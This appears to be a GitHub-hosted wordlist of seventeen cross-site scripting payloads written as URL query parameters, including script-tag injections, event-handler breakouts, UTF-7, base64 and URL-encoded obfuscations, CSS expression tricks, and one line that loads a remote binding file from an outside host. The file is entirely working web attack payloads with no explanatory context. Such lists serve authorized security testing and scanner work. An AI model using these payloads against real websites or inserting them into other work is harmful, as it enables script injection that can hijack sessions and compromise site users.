-
Notifications
You must be signed in to change notification settings - Fork 88
/
Copy pathwebapp-xss-scripts.txt
17 lines (17 loc) · 1.13 KB
/
webapp-xss-scripts.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
?xss0='\"'><script>alert(document.domain)</script>
?xss1='\"/onfocus=alert(domain) autofocus a=\"'
?xss2='\"'><marquee/onscroll=alert(domain)>XSS
?xss3=<a/href=data:text/html;charset=UTF-7,+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4->test
?xss4=]]><img src=xのerror=alert(1)>
?xss5=<script>alert(\"xss\")</script>
?xss6=\></a style=\"xss:ex/**/pression(alert(domain));\"
?xss7=''\"--><script>eval(String.fromCharCode(88,83,83)));%00
?xss8=\"/onerror=alert(domain)//
?xss9= style=\"-moz-binding:url(http://h4k.in/mozxss.xml#xss);\" a=\"
?xssa=<form id=\"test\" /><button form=\"test\" formaction=\"javascript:alert(document.domain)\">X
?xssb=\><video><source onerror=\"javascript:alert(document.domain)\">
?xssc=''\"--><comment><img src=\"</comment><img src=x onerror=alert(1))//\">
?xssd=<style><img src=\"</style><img src=x onerror=alert(domain)//\">
?xsse=<object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='>
?xssf=<img src=\"x` `<script>alert(1)</script>\"` `>
?xssg=0%20%73%54%79%4c%65%3d%58%3a%65%58%2f%2a%2a%2f%70%52%65%53%73%49%6f%4e%28%61%6c%65%72%74%28%36%36%31%35%35%29%29